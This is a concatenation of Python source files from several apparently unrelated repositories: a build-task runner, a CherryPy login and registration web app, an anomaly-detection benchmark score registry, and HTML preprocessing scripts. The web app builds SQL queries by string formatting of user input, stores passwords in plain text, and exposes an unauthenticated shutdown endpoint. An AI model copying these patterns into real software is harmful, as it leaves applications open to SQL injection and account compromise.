self.logger.setLevel(logging.ERROR)
for h in self.logger.handlers:
self.logger.removeHandler(h)
h = logging.StreamHandler(sys.stdout)
h.setFormatter(logging.Formatter('%(name)s - %(levelname)s - %(message)s'))
self.logger.addHandler(h)
self.logger.debug(f'{self.__class__.__name__}.__init__()')
self.tasks: List[Dict] = []
"""List of tasks"""
self.default_task = None
"""Name of the default task"""
def get_task_by_name(self, name):
"""
Get the task definition with the given name.
:param name: str - name of the task.
:return: Task definition or None if it does not exist.
"""
for task in self.tasks:
if 'name' in task and task['name'] == name:
return task
return None
def get_task_by_output(self, output):
"""
Get the task that generates the specified output. This means, output
is listed in the task's definition output list.
:param output: An output generated by some task/
:return: Task definition or None.
"""
for task in self.tasks:
if 'outputs' in task and output in task['outputs']:
return task
def run_(self, t=None):
"""
Internal run method.
:param t: Task name or definition
:return: True if the task ran. False otherwise.
"""
self.logger.debug(f'{self.__class__.__name__}.run_({t})')
# Run the default task if not specified.
t = t or self.default_task
task = None
if isinstance(t, dict):
task = t
if task is None:
task = self.get_task_by_name(t)
if task is None:
task = self.get_task_by_output(t)
if task is None:
raise RuntimeError('Task not found: {}'.format(t))
# Requirements? If so, recurse into them.
reqtasks = []
req_dates = []
newest_req_t = 0 # Beginning of times.
if 'reqs' in task:
for req in task['reqs']:
reqtask = self.get_task_by_output(req)
if reqtask is not None and reqtask not in reqtasks:
self.run_(reqtask) # Run requirement task
reqtasks.append(reqtask)
# Newest (in time) requirement
try:
req_dates = []
for req in task['reqs']:
rtask = self.get_task_by_output(req)
# This requirement is not to be ignored?
if (not rtask) or \
('flags' not in rtask) or \
('flags' not in task) or \
not (Builder.IGNOREPRESENT & task['flags']):
req_dates.append(os.path.getmtime(req))
newest_req_t = max(req_dates)
except FileNotFoundError as e:
raise CannotBuildError(str(e))
except ValueError as e:
pass # req_dates is empty.
# This task does not have requirements, or all requirements
# are ignored in the date comparison.
if 'reqs' not in task or len(req_dates) == 0:
# TODO: Must define how to handle. Force make for now.
if 'action' in task:
if ('flags' not in task) or (Builder.ALWAYS & task['flags']):
task['action'](task)
return True
if Builder.PRESENT & task['flags']:
try:
[os.path.getmtime(o) for o in task['outputs']]
except FileNotFoundError:
self.logger.info(task['name'] + ' is NOT up to date. Running.')
task['action'](task)
return True
self.logger.info(task['name'] + ' is up to date.')
return False # Did not run
else:
raise CannotBuildError("No action to build target")
# Oldest output
try:
oldest_output_t = min([os.path.getmtime(o) for o in task['outputs']])
except FileNotFoundError as e:
# Missing output, must run
if 'action' in task:
self.logger.info(task['name'] + ' is NOT up to date. Running.')
task['action'](task)
return True
else:
raise CannotBuildError("No action to build target")
# All outputs are present. Now let's compare dates with the requirements.
if newest_req_t > oldest_output_t:
# Requirement is newer, run actions
if 'action' in task:
self.logger.info(task['name'] + ' is NOT up to date. Running.')
task['action'](task)
return True
else:
raise CannotBuildError("No action to build target")
self.logger.info(task['name'] + ' is up to date.')
return False # Did not run
def run(self, t=None):
"""
Run a task.
:param t: Task specification. Can be a task name, or an output generated by
some task. If None (default) runs the default_task.
:return: True if the task ran. False otherwise.
"""
try:
return self.run_(t=t)
except CannotBuildError as e:
self.logger.error("ERROR: Could not build out-of-date target: {}".format(str(e)))
return False
def clean(self, t=None):
"""
Removes all the outputs of a task. If the task is not specified,
all outputs of all tasks are removed.
:param t: Task specification. Can be a task name, or an output generated by
some task.
:return: None
"""
task = None
if t is None:
for t_ in self.tasks:
self.clean(t=t_)
if isinstance(t, dict):
task = t
if t is None:
task = self.get_task_by_name(t)
if t is None:
task = self.get_task_by_output(t)
if task is None:
raise RuntimeError('Task not found: {}'.format(t))
for op in task['outputs']:
try:
os.remove(op)
except OSError:
pass
``` |
{
"source": "JPCatarino/amsG103CR",
"score": 3
} |
#### File: amsG103CR/CityRunning/webapp.py
```python
import cherrypy
from jinja2 import Environment, PackageLoader, select_autoescape
import os
from datetime import datetime
import psycopg2
from psycopg2 import Error
class WebApp(object):
def __init__(self):
self.env = Environment(
loader=PackageLoader('webapp', 'HTML'),
autoescape=select_autoescape(['html', 'xml'])
)
self.connect_string = "dbname='ams103' user='ams103' password='<PASSWORD>' host='deti-aulas.ua.pt' port=5432"
self.users = ["Atleta", "Admin", "Organizador", "Patrocinador"]
########################################################################################################################
# Utilities
def set_user(self, username=None):
if username == None:
cherrypy.session['user'] = {'is_authenticated': False, 'username': ''}
else:
cherrypy.session['user'] = {'is_authenticated': True, 'username': username}
def get_user(self):
if not 'user' in cherrypy.session:
self.set_user()
return cherrypy.session['user']
def render(self, tpg, tps):
template = self.env.get_template(tpg)
return template.render(tps)
def db_connection(conString):
try:
conn = psycopg2.connect(conString)
return conn
except Error as e:
print(e)
return None
def do_authenticationDB(self, usr, pwd):
user = self.get_user()
db_con = WebApp.db_connection(self.connect_string)
sql = "SELECT pwd,typeu FROM utilizador WHERE username == '{}';".format(usr)
curr = db_con.cursor()
curr.execute(sql)
if curr != None:
if curr[0] == pwd:
self.set_user(usr)
db_con.close()
return curr[1]
def do_regDB(self, usr, pwd, typeU):
if typeU not in self.users:
return None
db_con = WebApp.db_connection(self.connect_string)
sql = "INSERT INTO utilizador(username,password,typeU) VALUES ({},{},{});".format(usr, pwd, typeU)
curr = db_con.cursor()
curr.execute(sql)
db_con.commit()
if typeU == "Atleta":
sql = "INSERT INTO atleta(username) VALUE ({});".format(usr)
elif typeU == "Organizador":
sql = "INSERT INTO organizador(username) VALUE ({});".format(usr)
elif typeU == "Patrocinador":
sql = "INSERT INTO patrocinador(username) VALUE ({});".format(usr)
curr.execute(sql)
db_con.commit()
curr.close()
db_con.close()
########################################################################################################################
# Controllers
@cherrypy.expose
def login(self, username=None, password=<PASSWORD>):
if username == None:
tparams = {
'title': 'Login',
'errors': False,
'user': self.get_user(),
'year': datetime.now().year,
}
return self.render('login.html', tparams)
else:
self.do_authenticationDB(username, password)
if not self.get_user()['is_authenticated']:
tparams = {
'title': 'Login',
'errors': True,
'user': self.get_user(),
'year': datetime.now().year,
}
return self.render('login.html', tparams)
else:
raise cherrypy.HTTPRedirect("/")
@cherrypy.expose
def logout(self):
self.set_user()
raise cherrypy.HTTPRedirect("/")
@cherrypy.expose
def create(self, usr=None, pwd=None):
if usr == None:
tparams = {
'title': 'Create',
'errors': False,
'user': self.get_user(),
'year': datetime.now().year,
}
return self.render('create.html', tparams)
else:
if not self.get_user()['is_authenticated']:
tparams = {
'title': 'Create',
'errors': True,
'user': self.get_user(),
'year': datetime.now().year,
}
return self.render('create.html', tparams)
else:
self.do_regDB(usr, pwd)
raise cherrypy.HTTPRedirect("/")
@cherrypy.expose
def shut(self):
cherrypy.engine.exit()
if __name__ == '__main__':
conf = {
'/': {
'tools.sessions.on': True,
'tools.staticdir.root': os.path.abspath(os.getcwd())
},
'/HTML/assets': {
'tools.staticdir.on': True,
'tools.staticdir.dir': './HTML/assets'
}
}
cherrypy.quickstart(WebApp(), '/', conf)
``` |
{
"source": "jpcbertoldo/ad-scores",
"score": 3
} |
#### File: adscores/data/fcdd_2021_table2.py
```python
from pathlib import Path
import pandas as pd
txt_fifle = Path(__file__).parent / "fcdd_2021_table2.txt" # contains the data part of the table above
str_data = txt_fifle.read_text()
nlines_per_group = 11
# this is in the order of the lines inside each group of 11 lines
METHODS_NAMES = [
"AE-SS", "AE-L2", "Ano-GAN", "CNNFD",
"VEVAE", "SMAI", "GDR", "P-NET",
"FCDD-unsupervised", "FCDD-semi-supervised",
]
lines = str_data.strip().split("\n")
line_groups = [
lines[(i * nlines_per_group):((i + 1) * nlines_per_group)]
for i in range(len(lines) // nlines_per_group)
]
line_groups = [
{
"class": g[0].lower().replace(" ", "-"),
**{
col: float(val)
for col, val in zip(METHODS_NAMES, g[1:])
},
}
for g in line_groups
]
df = pd.DataFrame.from_records(data=line_groups).set_index("class")
def get_aess():
return df[["AE-SS"]].rename(columns={"AE-SS": "score"})
def get_ael2():
return df[["AE-L2"]].rename(columns={"AE-L2": "score"})
def get_ano_gan():
return df[["Ano-GAN"]].rename(columns={"Ano-GAN": "score"})
def get_cnnfd():
return df[["CNNFD"]].rename(columns={"CNNFD": "score"})
def get_vevae():
return df[["VEVAE"]].rename(columns={"VEVAE": "score"})
def get_smai():
return df[["SMAI"]].rename(columns={"SMAI": "score"})
def get_gdr():
return df[["GDR"]].rename(columns={"GDR": "score"})
def get_pnet():
return df[["P-NET"]].rename(columns={"P-NET": "score"})
def get_fcdd_unsupervised():
return df[["FCDD-unsupervised"]].rename(columns={"FCDD-unsupervised": "score"})
def get_fcdd_semi_supervised():
return df[["FCDD-semi-supervised"]].rename(columns={"FCDD-semi-supervised": "score"})
```
#### File: ad-scores/adscores/scores.py
```python
from collections import defaultdict
from dataclasses import dataclass
from email.policy import default
from enum import Enum
import traceback
from typing import Dict, List, Optional, Set, Tuple, Union
import warnings
from numpy import ndarray
from pandas import DataFrame
from pybtex.database.input import bibtex
from pathlib import Path
from adscores import constants
from adscores.data import fcdd_2021_table2
PAPERS_BIB_FPATH = Path(__file__).parent / "papers.bib"
bib_parser = bibtex.Parser()
bib_data = bib_parser.parse_file(str(PAPERS_BIB_FPATH))
class MissingInfo(KeyError):
pass
class UnknownDataset(Exception):
pass
class UnknownMetric(Exception):
pass
class DatasetKey(Enum):
mvtecad = "MVTec-AD"
cifar10 = "CIFAR-10"
cifar100 = "CIFAR-100"
fmnist = "Fashion-MNIST"
imagenet30ad = "ImageNet30AD"
imagenet1k = "ImageNet1k"
@staticmethod
def names() -> Tuple[str]:
return tuple(e.name for e in DatasetKey)
@staticmethod
def values() -> Tuple[str]:
return tuple(e.value for e in DatasetKey)
DATASETS_CLASSES_ABC = {
DatasetKey.mvtecad: constants.MVTECAD_CLASSES_ABC,
DatasetKey.cifar10: constants.CIFAR10_CLASSES_ABC,
DatasetKey.imagenet30ad: constants.IMAGENET_30AD_CLASSES_ABC,
DatasetKey.fmnist: constants.FMNIST_CLASSES_ABC,
}
DATASETS_CLASSES_ABC = {k.value: v for k, v in DATASETS_CLASSES_ABC.items()}
class MetricKey(Enum):
pixel_wise_auroc = "pixel_wise_auroc"
@staticmethod
def names() -> Tuple[str]:
return tuple(e.name for e in MetricKey)
@staticmethod
def values() -> Tuple[str]:
return tuple(e.value for e in MetricKey)
class SupervisionKey(Enum):
unsupervised = "unsupervised"
semi_supervised = "semi-supervised"
supervised = "supervised"
self_supervised = "self-supervised"
class TagKey(Enum):
src = "source"
src_detail = "source-detail"
# where the numbers where actually taken from by the source
# not necessarily the paper where the method was published
src_original = "source-original"
method = "method"
method_ref = "method-reference"
method_abbr = "method-abbreviation"
dataset = "dataset"
dataset_ref = "dataset-reference"
metric = "metric"
metric_perclass = "metric-per-class"
metric_percentage = "metric-percentage"
# number of experiences that were averaged to get the score value
metric_niter = "metric-number-of-iterations"
oe = "outlier-exposure"
pretraining = "pretraining"
supervision = "supervision"
REFERENCE_TAGKEYS = (
TagKey.src,
TagKey.src_original,
TagKey.method_ref,
TagKey.dataset_ref,
)
class TagValues(Enum):
yes = "yes"
no = "no"
@dataclass
class Tag:
key: TagKey
value: str
def __post_init__(self):
if isinstance(self.value, Enum):
self.value = self.value.value
@dataclass
class Score:
value: Union[int, float, ndarray, DataFrame] = None
tags: Tuple[Tag] = ()
def __post_init__(self):
# make sure the tag keys are unique
tagkeys = set()
for tag in self.tags:
assert isinstance(tag, Tag), f"{tag=}"
assert isinstance(tag.key, TagKey), f"{tag.key=}"
if tag.key in tagkeys:
raise KeyError(f"Tag key {tag.key} already exists. Tags must be unique. Tags: {self.tags}")
tagkeys.add(tag.key)
@property
def tag_keys(self) -> Set[str]:
return {tag.key for tag in self.tags}
def __getitem__(self, key: TagKey) -> str:
assert isinstance(key, TagKey)
for tag in self.tags:
if tag.key == key:
return tag.value
else:
raise MissingInfo(f"Tag key {key=} not found in {self.tags=}")
def tags_as_dict(self) -> dict:
return {tag.key.value: tag.value for tag in self.tags}
SCORES = []
# =============================================================================
# from liznerski_explainable_2021
# <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., 2021. Explainable Deep One-Class Classification, in: International Conference on Learning Representations. Presented at the International Conference on Learning Representations.
# Table 3
# =============================================================================
SCORES.extend([
Score(
value=fcdd_2021_table2.get_aess(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="bergmann_mvtec_2019"),
Tag(key=TagKey.method, value="Scores for Self-Similarity"),
Tag(key=TagKey.method_abbr, value="AE-SS"),
Tag(key=TagKey.method_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_ael2(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="bergmann_mvtec_2019"),
Tag(key=TagKey.method, value="L2 Autoencoder"),
Tag(key=TagKey.method_abbr, value="AE-L2"),
Tag(key=TagKey.method_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_ano_gan(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="bergmann_mvtec_2019"),
Tag(key=TagKey.method, value="AnoGAN"),
Tag(key=TagKey.method_abbr, value="AnoGAN"),
Tag(key=TagKey.method_ref, value="schlegl_unsupervised_2017"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_cnnfd(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="bergmann_mvtec_2019"),
Tag(key=TagKey.method, value="CNN Feature Dictionaries"),
Tag(key=TagKey.method_abbr, value="CNNFD"),
Tag(key=TagKey.method_ref, value="napoletano_anomaly_2018"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_vevae(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="liu_towards_2020"),
Tag(key=TagKey.method, value="Visually Explained Variational Autoencoder"),
Tag(key=TagKey.method_abbr, value="VEVAE"),
Tag(key=TagKey.method_ref, value="liu_towards_2020"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_smai(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="li_superpixel_2020"),
Tag(key=TagKey.method, value="Superpixel Masking and Inpainting"),
Tag(key=TagKey.method_abbr, value="SMAI"),
Tag(key=TagKey.method_ref, value="li_superpixel_2020"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_gdr(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="dehaene_iterative_2020"),
Tag(key=TagKey.method, value="Gradient Descent Reconstruction with VAEs"),
Tag(key=TagKey.method_abbr, value="GDR"),
Tag(key=TagKey.method_ref, value="dehaene_iterative_2020"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_pnet(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="zhou_encoding_2020"),
Tag(key=TagKey.method, value="Encoding Structure-Texture Relation with P-Net for AD"),
Tag(key=TagKey.method_abbr, value="P-NET"),
Tag(key=TagKey.method_ref, value="zhou_encoding_2020"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_fcdd_unsupervised(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.method, value="Fully Convolutional Data Description (unsupervised)"),
Tag(key=TagKey.method_abbr, value="FCDD-unsup"),
Tag(key=TagKey.method_ref, value="liznerski_explainable_2021"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
Tag(key=TagKey.metric_niter, value="5"),
)
),
Score(
value=fcdd_2021_table2.get_fcdd_semi_supervised(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.method, value="Fully Convolutional Data Description (semi-supervised)"),
Tag(key=TagKey.method_abbr, value="FCDD-semi-sup"),
Tag(key=TagKey.method_ref, value="liznerski_explainable_2021"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
Tag(key=TagKey.metric_niter, value="5"),
)
),
])
# =============================================================================
# UTIL FUNCTIONS
# =============================================================================
def get_dataset(score: Score) -> str:
return score[TagKey.dataset]
def get_metric(score: Score) -> str:
return score[TagKey.metric]
def score_is_perclass(score: Score, assume_no=True) -> bool:
return score[TagKey.metric_perclass] == TagValues.yes.value
def get_dataset_classes_abc(score: Score) -> Tuple[str]:
dataset_key = score[TagKey.dataset]
try:
return DATASETS_CLASSES_ABC[dataset_key]
except KeyError as ex:
raise UnknownDataset(f"Unknown dataset classes {dataset_key=}. {score.tags=}") from ex
def _validate_and_normalize_dataset(dataset: Union[DatasetKey, str]) -> str:
if isinstance(dataset, DatasetKey):
return dataset.value
elif isinstance(dataset, str):
if dataset in DatasetKey.names():
return DatasetKey[dataset].value
elif dataset in DatasetKey.values():
return dataset
else:
raise UnknownDataset(f"Unknown dataset {dataset=}")
else:
raise TypeError(f"Expected {DatasetKey=} or {str=}, got {type(dataset)=}")
def _validate_and_normalize_metric(metric: Union[MetricKey, str]) -> str:
if isinstance(metric, MetricKey):
return metric.value
elif isinstance(metric, str):
if metric in MetricKey.names():
return MetricKey[metric].value
elif metric in MetricKey.values():
return metric
else:
raise UnknownMetric(f"Unknown metric {metric=}")
else:
raise TypeError(f"Expected {MetricKey=} or {str=}, got {type(metric)=}")
def get_perclass_scores(dataset: Union[DatasetKey, str], metric: Union[MetricKey, str]) -> DataFrame:
dataset = _validate_and_normalize_dataset(dataset)
metric = _validate_and_normalize_metric(metric)
return [
s for s in SCORES
if score_is_perclass(s)
and get_dataset(s) == dataset
and get_metric(s) == metric
]
def score_perclass_2_records(score: Score) -> List[dict]:
assert score_is_perclass(score), f"Expected per-class score, got {score.tags=}"
# score.value is expected to be a DataFrame with one column "score"
# and the index is the class names
return [
{
"class": idx,
"score": row["score"],
**score.tags_as_dict(),
}
for idx, row in score.value.iterrows()
]
# =============================================================================
# VALIDATION FUNCTIONS
# =============================================================================
def _get_unknown_refs(scores: List[Score]) -> List[str]:
unknown_refs = set()
for s in scores:
refs = [
t.value
for t in s.tags
if t.key in REFERENCE_TAGKEYS
]
for r in refs:
if r not in bib_data.entries.keys():
unknown_refs.add(r)
return sorted(list(unknown_refs))
def _get_missing_values(scores: List[Score]) -> List[str]:
missing_values = set()
for idx, s in enumerate(scores):
if s.value is None:
missing_values.add(idx)
return sorted(list(missing_values))
def validate_scores_perclass(scores: List[Score]) -> None:
for idx, s in enumerate(scores):
if not score_is_perclass(s, assume_no=True):
continue
try:
dataset_classes_abc = get_dataset_classes_abc(s)
except UnknownDataset as ex:
traceback.print_exc()
raise ex
df: DataFrame = s.value
if df is None:
warnings.warn(f"Score per class is None. Skipping. {idx=} {s.tags=}")
print("\n\n")
continue
elif not isinstance(df, DataFrame):
warnings.warn(f"Score per class is not a DataFrame. Skipping. {idx=} {s.tags=}")
print("\n\n")
continue
if not tuple(df.index.values) == dataset_classes_abc:
warnings.warn(f"Classes in score per class is wrong. Skipping. {idx=} {s.tags=}")
print("\n\n")
continue
def validate_metrics(scores: List[Score]) -> None:
for idx, s in enumerate(scores):
try:
_validate_and_normalize_metric(get_metric(s))
except (UnknownMetric, MissingInfo) as ex:
print(f"{idx=} {s.tags=}")
traceback.print_exc()
def validate_datasets(scores: List[Score]) -> None:
for idx, s in enumerate(scores):
try:
_validate_and_normalize_dataset(get_dataset(s))
except (UnknownDataset, MissingInfo) as ex:
print(f"{idx=} {s.tags=}")
traceback.print_exc()
# =============================================================================
# MAIN
# =============================================================================
if __name__ == "__main__":
unknown_refs = _get_unknown_refs(SCORES)
if len(unknown_refs) > 0:
warnings.warn(f"Unknown refs: {', '.join(unknown_refs)}")
missing_values = _get_missing_values(SCORES)
if len(missing_values) > 0:
warnings.warn(f"Missing values (index of the score in the list SCORES): {', '.join(map(str, missing_values))}")
validate_datasets(SCORES)
validate_metrics(SCORES)
validate_scores_perclass(SCORES)
``` |
{
"source": "jpcbertoldo/pymdr",
"score": 3
} |
#### File: dev/first_sketch/dev_2.py
```python
import lxml
import lxml.html
import lxml.etree
import os
from collections import defaultdict
from graphviz import Digraph
HIERARCHICAL = "hierarchical"
SEQUENTIAL = "sequential"
def open_doc(folder, filename):
folder = os.path.abspath(folder)
filepath = os.path.join(folder, filename)
with open(filepath, "r") as file:
doc = lxml.html.fromstring(
lxml.etree.tostring(lxml.html.parse(file), method="html")
)
return doc
def html_to_dot_sequential_name(html, with_text=False):
graph = Digraph(name="html")
tag_counts = defaultdict(int)
def add_node(html_node):
tag = html_node.tag
tag_sequential = tag_counts[tag]
tag_counts[tag] += 1
node_name = "{}-{}".format(tag, tag_sequential)
graph.node(node_name, node_name)
if len(html_node) > 0:
for child in html_node.iterchildren():
child_name = add_node(child)
graph.edge(node_name, child_name)
else:
child_name = "-".join([node_name, "txt"])
graph.node(child_name, html_node.text)
graph.edge(node_name, child_name)
return node_name
add_node(html)
return graph
def html_to_dot_hierarchical_name(html, with_text=False):
graph = Digraph(name="html")
def add_node(html_node, parent_suffix, brotherhood_index):
tag = html_node.tag
if parent_suffix is None and brotherhood_index is None:
node_suffix = ""
node_name = tag
else:
node_suffix = (
"-".join([parent_suffix, str(brotherhood_index)])
if parent_suffix
else str(brotherhood_index)
)
node_name = "{}-{}".format(tag, node_suffix)
graph.node(node_name, node_name, path=node_suffix)
if len(html_node) > 0:
for child_index, child in enumerate(html_node.iterchildren()):
child_name = add_node(child, node_suffix, child_index)
graph.edge(node_name, child_name)
else:
child_name = "-".join([node_name, "txt"])
child_path = "-".join([node_suffix, "txt"])
graph.node(child_name, html_node.text, path=child_path)
graph.edge(node_name, child_name)
return node_name
add_node(html, None, None)
return graph
def html_to_dot(html, name_option="hierarchical", with_text=False):
if name_option == SEQUENTIAL:
return html_to_dot_sequential_name(html, with_text=with_text)
elif name_option == HIERARCHICAL:
return html_to_dot_hierarchical_name(html, with_text=with_text)
else:
raise Exception("No name option `{}`".format(name_option))
```
#### File: dev/training/preprocess_all.py
```python
import functools
import logging
import multiprocessing
from typing import List
import tqdm
import core
import files_management as fm
import prepostprocessing as ppp
COMP_DIST_MAX_TAG_PER_GNODE = 15
COMP_DISTANCES_MIN_DEPTH = 0
MINIMUM_DEPTH = 3
MAX_TAGS_PER_GNODE = 10
N_PROCESSES = 3
logging.basicConfig(
level=logging.INFO, format="[%(filename)s:%(lineno)s - %(funcName)20s()] %(message)s"
)
logging.info("n available processes: %d", multiprocessing.cpu_count())
class log_and_ignore_fails(object):
def __init__(self, target):
self.target = target
try:
functools.update_wrapper(self, target)
except Exception as ex:
import traceback
print(ex)
traceback.print_stack()
def __call__(self, *args, **kwargs):
try:
self.target(*args, **kwargs)
except Exception as ex:
page_id = args[0].page_id
logging.error("FAIL. page_id=%s ex=%s", page_id, ex)
import traceback
traceback.print_tb(ex.__traceback__)
def download_all_pages(pages_metas):
pages_metas = sorted(pages_metas.values(), key=lambda x: x.page_id)
with multiprocessing.Pool(N_PROCESSES) as pool:
pool.map(log_and_ignore_fails(ppp.download_raw), pages_metas)
def cleanup_all_pages(pages_metas):
pages_metas = sorted(pages_metas.values(), key=lambda x: x.page_id)
with multiprocessing.Pool(N_PROCESSES) as pool:
pool.map(log_and_ignore_fails(ppp.cleanup_html), pages_metas)
def compute_all_distances(pages_metas):
pages_metas = sorted(pages_metas.values(), key=lambda x: x.page_id)
precompute_distances = functools.partial(
ppp.precompute_distances,
minimum_depth=COMP_DISTANCES_MIN_DEPTH,
max_tag_per_gnode=COMP_DIST_MAX_TAG_PER_GNODE,
force_override=False,
)
with multiprocessing.Pool(N_PROCESSES) as pool:
pool.map(log_and_ignore_fails(precompute_distances), pages_metas)
def compute_data_regions(
pages: List[fm.PageMeta],
distance_thresholds: List[float],
minimum_depth: int,
max_tags_per_gnode: int,
):
n_runs = len(pages) * len(distance_thresholds)
logging.info("Number of combinations: {}".format(n_runs))
for th in tqdm.tqdm(distance_thresholds, desc="thresholds"):
run_th = functools.partial(
ppp.precompute_data_regions,
threshold=th,
minimum_depth=minimum_depth,
max_tags_per_gnode=max_tags_per_gnode,
)
with multiprocessing.Pool(N_PROCESSES) as pool:
pool.map(log_and_ignore_fails(run_th), pages)
def compute_data_records(
pages: List[fm.PageMeta],
distance_thresholds: List[float], # will only consider cases where all dist th are the same
max_tags_per_gnode: int,
):
n_runs = len(pages) * len(distance_thresholds)
logging.info("Number of combinations: {}".format(n_runs))
for th in tqdm.tqdm(distance_thresholds, desc="thresholds"):
run_th = functools.partial(
ppp.precompute_data_records,
thresholds=core.MDREditDistanceThresholds.all_equal(th),
max_tags_per_gnode=max_tags_per_gnode,
)
with multiprocessing.Pool(N_PROCESSES) as pool:
pool.map(log_and_ignore_fails(run_th), pages)
def main(
exec_download=True, exec_cleanup=True, exec_distances=True, exec_drs=True, exec_drecs=True,
):
# only get the annotated ones
all_labeled_pages = {
page_id: page_meta
for page_id, page_meta in fm.PageMeta.get_all().items()
if page_meta.n_data_records is not None
}
logging.info("Number of labeled pages: %d.", len(all_labeled_pages))
if exec_download:
download_all_pages(all_labeled_pages)
all_downloaded_pages = {
page_id: page_meta
for page_id, page_meta in fm.PageMeta.get_all().items()
if page_meta.raw_html.exists()
}
logging.info("Number of downloaded pages: %d.", len(all_downloaded_pages))
if exec_cleanup:
cleanup_all_pages(all_downloaded_pages)
all_cleaned_pages = {
page_id: page_meta
for page_id, page_meta in fm.PageMeta.get_all().items()
if page_meta.preprocessed_html.exists()
}
logging.info("Number of preprocessed pages: %d.", len(all_cleaned_pages))
if exec_distances:
compute_all_distances(all_cleaned_pages)
pages_with_distance = {
page_id: page_meta
for page_id, page_meta in fm.PageMeta.get_all().items()
if page_meta.distances_pkl.exists()
}
logging.info("Number of pages with distance: %d.", len(pages_with_distance))
distance_thresholds = [th / 100 for th in range(5, 50 + 1)]
logging.info("Number of threshold: %d.", len(distance_thresholds))
if exec_drs:
compute_data_regions(
list(pages_with_distance.values()),
distance_thresholds,
MINIMUM_DEPTH,
MAX_TAGS_PER_GNODE,
)
pages_with_distance_and_all_th = {
page_id: page_meta
for page_id, page_meta in fm.PageMeta.get_all().items()
if page_meta.distances_pkl.exists()
and all(page_meta.data_regions_pkl(th, MAX_TAGS_PER_GNODE) for th in distance_thresholds)
}
logging.info(
"Number of pages to computed data records: %d.", len(pages_with_distance_and_all_th)
)
if exec_drecs:
compute_data_records(
list(pages_with_distance_and_all_th.values()), distance_thresholds, MAX_TAGS_PER_GNODE
)
if __name__ == "__main__":
main(
exec_download=False,
exec_cleanup=False,
exec_distances=True,
exec_drs=True,
exec_drecs=True,
)
from files_management import cleanup_pages_meta_lock
cleanup_pages_meta_lock()
```
#### File: pymdr/src/prepostprocessing.py
```python
import datetime
import logging
import urllib
import urllib.request
import urllib.response
from typing import Tuple
import lxml
import lxml.etree
import lxml.html
import retrying
import core
import files_management as fm
logging.basicConfig(
